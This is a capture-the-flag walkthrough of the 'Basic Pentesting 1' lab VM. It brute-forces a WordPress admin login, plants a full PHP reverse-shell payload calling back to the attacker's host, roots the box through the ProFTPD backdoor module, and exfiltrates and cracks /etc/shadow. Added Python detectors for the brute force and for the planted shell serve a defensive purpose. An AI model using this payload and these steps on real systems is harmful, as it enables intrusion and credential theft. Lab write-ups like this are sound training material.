On Sunday afternoon I was bored, so I decided to do a quick and simple VulnHub CTF. This time it was csec, Basic Pentesting 1. In reality it took me a little over an hour. You can download it from here:
https://www.vulnhub.com/entry/basic-pentesting-1,216/
The attacking machine's IP will be 192.168.1.56.
First, we scan the whole network:
nmap -sS -sV -O 192.168.1.0/24
Nmap scan report for vtcsec.home (192.168.1.85)
Host is up (0.00057s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:AD:0D:CB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Good, we have now discovered that our victim's IP is 192.168.1.87.
We open the web page.
We run a directory scan:
dirb http://192.168.1.85 -o dirb
-----------------
DIRB v2.22
By The Dark Raver
-----------------
OUTPUT_FILE: dirb
START_TIME: Sun Feb 16 18:37:29 2020
URL_BASE: http://192.168.1.85/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.85/ ----
+ http://192.168.1.85/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://192.168.1.85/secret/
+ http://192.168.1.85/server-status (CODE:403|SIZE:300)
---- Entering directory: http://192.168.1.85/secret/ ----
+ http://192.168.1.85/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/
==> DIRECTORY: http://192.168.1.85/secret/wp-content/
==> DIRECTORY: http://192.168.1.85/secret/wp-includes/
+ http://192.168.1.85/secret/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.1.85/secret/wp-admin/ ----
+ http://192.168.1.85/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/css/
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/images/
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/includes/
+ http://192.168.1.85/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/js/
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/maint/
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/network/
==> DIRECTORY: http://192.168.1.85/secret/wp-admin/user/
---- Entering directory: http://192.168.1.85/secret/wp-content/ ----
+ http://192.168.1.85/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.85/secret/wp-content/plugins/
==> DIRECTORY: http://192.168.1.85/secret/wp-content/themes/
---- Entering directory: http://192.168.1.85/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.85/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.85/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.85/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.85/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.85/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.85/secret/wp-admin/network/ ----
+ http://192.168.1.85/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.85/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.85/secret/wp-admin/user/ ----
+ http://192.168.1.85/secret/wp-admin/user/admin.php (CODE:503|SIZE:288)
+ http://192.168.1.85/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.85/secret/wp-content/plugins/ ----
+ http://192.168.1.85/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.85/secret/wp-content/themes/ ----
+ http://192.168.1.85/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
-----------------
END_TIME: Sun Feb 16 18:37:57 2020
DOWNLOADED: 36896 - FOUND: 13
In the secret subdirectory we have a blog.
Judging by the subdirectories, this blog is built on WordPress, so let's look at its vulnerabilities.
wpscan --url http://192.168.1.85/secret --enumerate u --output wpscan1
We get the following output:
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.7.5
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.1.85/secret/
[+] Started: Sun Feb 16 18:43:21 2020
Interesting Finding(s):
[+] http://192.168.1.85/secret/
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.1.85/secret/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.1.85/secret/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.85/secret/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.1.85/secret/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.9.13 identified (Latest, released on 2019-12-12).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.1.85/secret/, Match: '-release.min.js?ver=4.9.13'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.1.85/secret/, Match: 'WordPress 4.9.13'
[i] The main theme could not be detected.
[i] User(s) Identified:
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
[+] Finished: Sun Feb 16 18:43:23 2020
[+] Requests Done: 61
[+] Cached Requests: 5
[+] Data Sent: 12.369 KB
[+] Data Received: 14.531 MB
[+] Memory used: 100.761 MB
[+] Elapsed time: 00:00:02
We see that there is an admin user.
We create a file with the users found, in this case just one, admin:
echo admin > admin.txt
We run a brute-force attack:
wpscan --url http://192.168.1.85/secret --usernames admin.txt --passwords /usr/share/wordlists/metasploit/unix_passwords.txt
[…]
[+] Performing password attack on Wp Login against 1 user/s
Trying admin / admin Time: 00:00:00 <=============> (5 / 5) 100.00% Time: 00:00:00
[SUCCESS] - admin / admin
[…]
Good, the password is admin.
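From the defender's side, the brute force above leaves a very recognisable trace in the Apache access log: a burst of POSTs to wp-login.php from one client (WordPress answers a failed login with 200 and a successful one with a 302 redirect), followed by a POST to wp-admin/theme-editor.php when the theme file is saved. The following detector is an added example, not part of the original post; the log lines, the 60-second window and the threshold of 4 are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-log sample (not from the original post): a burst
# of wp-login.php POSTs from one client, the 302 of a successful login, an
# unrelated visitor, and finally a theme-editor save.
SAMPLE_LOG = """\
192.168.1.56 - - [16/Feb/2020:18:50:01 +0100] "POST /secret/wp-login.php HTTP/1.1" 200 2834 "-" "WPScan v3.7.5"
192.168.1.56 - - [16/Feb/2020:18:50:01 +0100] "POST /secret/wp-login.php HTTP/1.1" 200 2834 "-" "WPScan v3.7.5"
192.168.1.56 - - [16/Feb/2020:18:50:02 +0100] "POST /secret/wp-login.php HTTP/1.1" 200 2834 "-" "WPScan v3.7.5"
192.168.1.56 - - [16/Feb/2020:18:50:02 +0100] "POST /secret/wp-login.php HTTP/1.1" 200 2834 "-" "WPScan v3.7.5"
192.168.1.56 - - [16/Feb/2020:18:50:03 +0100] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.7.5"
192.168.1.20 - - [16/Feb/2020:18:52:10 +0100] "GET /secret/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.56 - - [16/Feb/2020:19:01:45 +0100] "POST /secret/wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse(lines):
    """Yield (ip, timestamp, method, path, status) for each well-formed line."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
        yield m['ip'], ts, m['method'], m['path'], int(m['status'])

def detect(lines, threshold=4, window=timedelta(seconds=60)):
    """Return alert strings: a login burst per source IP, a success right
    after such a burst, and any write through the theme editor."""
    alerts = []
    recent = defaultdict(list)   # ip -> timestamps of login POSTs inside the window
    for ip, ts, method, path, status in parse(lines):
        if method == 'POST' and path.endswith('/wp-login.php'):
            hits = [t for t in recent[ip] if ts - t <= window] + [ts]
            recent[ip] = hits
            if len(hits) == threshold:
                alerts.append(f'{ip}: {threshold} wp-login.php POSTs within {window.seconds}s (possible brute force)')
            elif status == 302 and len(hits) > threshold:
                alerts.append(f'{ip}: successful login (302) right after a burst of failures')
        elif method == 'POST' and path.endswith('/wp-admin/theme-editor.php'):
            alerts.append(f'{ip}: theme file written through theme-editor.php')
    return alerts
```

Run over a real access log the same function raises one alert per burst rather than one per request, so it is cheap to feed into fail2ban-style blocking or a SIEM rule.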
We go to the administration directory.
We enter the username and password, admin and admin.
We go to Appearance → Themes → Editor and select index.php.
Now let's create a PHP reverse shell:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.56 LPORT=3333 -f raw > shell.php
Now we edit the generated file, leaving it exactly as shown:
/**/ error_reporting(0);
$ip = '192.168.1.56';
$port = 3333;
if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; }
if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; }
if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; }
if (!$s_type) { die('no socket funcs'); }
if (!$s) { die('no socket'); }
switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; }
if (!$len) { die(); }
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } }
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); }
die();
We paste this code into index.php.
We click the Update File button.
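The theme editor turns one weak admin password into code execution because it writes arbitrary PHP into the web root. Besides the log trace, a defender can spot the result on disk: the staged payload calls functions (socket setup, eval, create_function) that a theme's index.php never needs. The scanner below is an added example, not part of the original post or of WordPress; the indicator weights and the two demo theme files it creates in a temporary directory are constructed assumptions.

```python
import os
import re
import tempfile

# Weighted indicators taken from what the staged PHP reverse shell relies on;
# a template file that renders pages has no reason to use any of them.
SUSPICIOUS = {
    r'\beval\s*\(': 5,
    r'\bcreate_function\s*\(': 4,
    r'\bstream_socket_client\s*\(': 3,
    r'\bfsockopen\s*\(': 3,
    r'\bsocket_create\s*\(': 3,
    r'\berror_reporting\s*\(\s*0\s*\)': 1,
}

def score_file(path):
    """Sum the weights of every indicator present in one PHP file."""
    with open(path, encoding='utf-8', errors='replace') as fh:
        src = fh.read()
    return sum(w for pat, w in SUSPICIOUS.items() if re.search(pat, src))

def scan_themes(root, threshold=5):
    """Return sorted [(path relative to root, score)] for PHP files at or above threshold."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith('.php'):
                full = os.path.join(dirpath, name)
                score = score_file(full)
                if score >= threshold:
                    findings.append((os.path.relpath(full, root), score))
    return sorted(findings)

# Constructed demo tree (not the VM's files): an ordinary theme index.php and
# one whose body was replaced with a socket-and-eval stub like the one above.
BENIGN = "<?php get_header(); the_content(); get_footer();\n"
TAMPERED = ("/**/ error_reporting(0); $s = stream_socket_client('tcp://10.0.0.1:3333');\n"
            "$b = fread($s, 4096); eval($b);\n")

def build_demo_tree():
    root = tempfile.mkdtemp()
    for theme, body in (('clean', BENIGN), ('tampered', TAMPERED)):
        os.makedirs(os.path.join(root, theme))
        with open(os.path.join(root, theme, 'index.php'), 'w') as fh:
            fh.write(body)
    return root

def demo():
    """Build the demo tree and scan it; only the tampered theme is reported."""
    return scan_themes(build_demo_tree())
```

Point scan_themes at wp-content/themes of a live install to run it for real; the matching hardening is `define('DISALLOW_FILE_EDIT', true);` in wp-config.php, which removes the theme and plugin editors from the dashboard altogether.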
We start Metasploit:
msfconsole
We enter the options:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf5 exploit(multi/handler) > set LPORT 3333
LPORT => 3333
msf5 exploit(multi/handler) > set ExitOnSession False
ExitOnSession => false
msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:3333
msf5 exploit(multi/handler) >
In another browser tab we enter:
And in our Metasploit window the following happens:
We're in.
We'll open a shell:
meterpreter > shell
Process 1408 created.
Channel 0 created.
Let's see who we are:
whoami
www-data
So we are the www-data user.
Let's see which GNU/Linux version we have:
uname -r
4.10.0-28-generic
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"
If we go to the /home directory we find a folder called marlinspike, so that is going to be a user.
In fact, we have permission to see what is inside:
ls
046e85f6fe460de94fd46198feef4d07-backdoored_proftpd-1.3.3c.tar.gz
046e85f6fe460de94fd46198feef4d07-backdoored_proftpd-1.3.3c.tar.gz.bak
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backdoored_proftpd-1.3.3c
examples.desktop
latest.tar.gz
proftpd-1.3.3c
proftpd-1.3.3c.tar.bz2
proftpd-1.3.3c.tar.bz2.bak
wordpress
We notice proftpd-1.3.3c; this is a version of the FTP server that was infected with a backdoor. We could download the exploit and use it, but in our case we'll use the Metasploit module. To do that, we exit the shell.
exit
meterpreter >
We use background to return to Metasploit.
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > use exploit/unix/ftp/proftpd_133c_backdoor
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name    Current Setting  Required  Description
----    ---------------  --------  -----------
RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT   21               yes       The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.1.85
RHOSTS => 192.168.1.85
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.1.56:4444
[*] 192.168.1.85:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7zz0sztruywJukhx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "7zz0sztruywJukhx\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (192.168.1.56:4444 -> 192.168.1.85:44476) at 2020-02-17 11:53:03 +0100
whoami
root
So we are now administrators of the system.
Let's try to obtain the users' passwords:
mkdir /var/www/html/secret/passwords
cp /etc/passwd* /var/www/html/secret/passwords
cp /etc/shadow /var/www/html/secret/passwords
cd /var/www/html/secret/passwords
tar cvfz passwords.tar.gz *
passwd
passwd-
shadow
In another terminal:
We download the files.
We extract them:
tar xvfz passwords.tar.gz
Now we'll crack the password:
root@kali:~/csec# john shadow
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2020-02-17 12:28) 3.571g/s 28.57p/s 28.57c/s 28.57C/s marlinspike..marlin
Use the "--show" option to display all of the cracked passwords reliably
Session completed
As we saw in the nmap output, we also have an SSH server running, so we can log in through it:
root@kali:~/csec# ssh marlinspike@192.168.1.85
marlinspike@192.168.1.85's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage
608 packages can be updated.
445 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
marlinspike@vtcsec:~$
Now we'll enable the Ubuntu root account; for that we use sudo -i, and it will ask us for the password we want for the root user:
marlinspike@vtcsec:~/Documents$ sudo -i
[sudo] password for marlinspike:
root@vtcsec:~#
And we're done.